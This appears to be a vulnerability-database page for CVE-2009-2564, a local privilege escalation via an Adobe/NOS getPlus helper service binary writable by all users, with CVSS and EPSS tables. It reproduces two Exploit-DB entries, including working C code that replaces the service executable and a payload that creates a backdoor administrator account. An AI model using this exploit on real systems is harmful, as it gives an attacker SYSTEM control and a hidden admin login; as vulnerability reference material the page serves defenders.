CVE-2009-2564

OWSAP

A01-Broken Access Control

EPSS

0.18%V4

Vector

Local

Published

2009-07-21
15h00 +00:00

Modified

2018-10-10
16h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

NOS Microsystems getPlus Download Manager, as used in Adobe Reader 1.6.2.36 and possibly other versions, Corel getPlus Download Manager before 1.5.0.48, and possibly other products, installs NOS\bin\getPlus_HelperSvc.exe with insecure permissions (Everyone:Full Control), which allows local users to gain SYSTEM privileges by replacing getPlus_HelperSvc.exe with a Trojan horse program, as demonstrated by use of getPlus Download Manager within Adobe Reader. NOTE: within Adobe Reader, the scope of this issue is limited because the program is deleted and the associated service is not automatically launched after a successful installation and reboot.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-264	Category : Permissions, Privileges, and Access Controls Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.2		AV:L/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	8.28%	–	–
2022-02-27	–	–	8.28%	–	–
2022-04-03	–	–	8.28%	–	–
2022-07-17	–	–	3.22%	–	–
2022-07-24	–	–	8.28%	–	–
2023-02-26	–	–	8.28%	–	–
2023-03-12	–	–	–	0.04%	–
2024-04-07	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2024-10-13	–	–	–	0.04%	–
2024-12-15	–	–	–	0.04%	–
2024-12-22	–	–	–	0.17%	–
2025-03-02	–	–	–	0.17%	–
2025-01-19	–	–	–	0.17%	–
2025-03-09	–	–	–	0.17%	–
2025-03-18	–	–	–	–	0.18%
2025-03-30	–	–	–	–	0.18%
2025-03-30	–	–	–	–	0.18,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	82%
2022-02-27	83%
2022-04-03	93%
2022-07-17	83%
2022-07-24	93%
2023-02-26	94%
2023-03-12	8%
2024-04-07	9%
2024-06-02	1%
2024-10-13	11%
2024-12-15	12%
2024-12-22	55%
2025-03-02	56%
2025-01-19	55%
2025-03-09	56%
2025-03-18	37%
2025-03-30	36%
2025-03-30	36%

Exploit information

Exploit Database EDB-ID : 9199

Publication date : 2009-07-19 22h00 +00:00
Author : Nine:Situations:Group
EDB Verified : Yes

Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges by Nine:Situations:Group site: http://retrogod.altervista.org/ description: Adobe downloader used to download updates for Adobe applications. Shipped with Acrobat Reader 9.x vendor: Nos Microsystems poc: C:\>sc qc "getPlus(R) Helper" [SC] GetServiceConfig SUCCESS SERVICE_NAME: getPlus(R) Helper TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : getPlus(R) Helper DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe" C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!] NT AUTHORITY\SYSTEM:F The executable file is installed with improper permissions, with "full control" for Builtin Users; a simple user can replace it with a binary of choice. At the next reboot it will run with SYSTEM privileges. # milw0rm.com [2009-07-20]

Exploit Database EDB-ID : 9223

Publication date : 2009-07-20 22h00 +00:00
Author : Jeremy Brown
EDB Verified : Yes

/* alwaysdirtyneverclean.c AKA Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) BY Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 *********************************************************************************************************** I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2) isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just the first time though). Change the values as needed, compile and run. Things could be more or less silent, lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :) Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated) But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time. *********************************************************************************************************** alwaysdirtyneverclean.c */ #include <stdio.h> #include <windows.h> #define DEFAULT_TARGET "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe" #define DEFAULT_BACKUP "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak" #define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe" //#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe" int main(int argc, char *argv[]) { MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP); CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE); // shakee and bakeee return 0; } ///////////////////////////////////// cut ///////////////////////////////////// /* bin.c FROM Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) BY Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 */ #include <stdio.h> #include <windows.h> #define CMD "C:\\WINDOWS\\system32\\cmd.exe" #define ONE "/C net user adobe pwned /add" #define TWO "/C net localgroup administrators adobe /add" int main(int argc, char *argv[]) { STARTUPINFO si = {sizeof(STARTUPINFO)}; PROCESS_INFORMATION pi; CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi); // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood return 0; } # milw0rm.com [2009-07-21]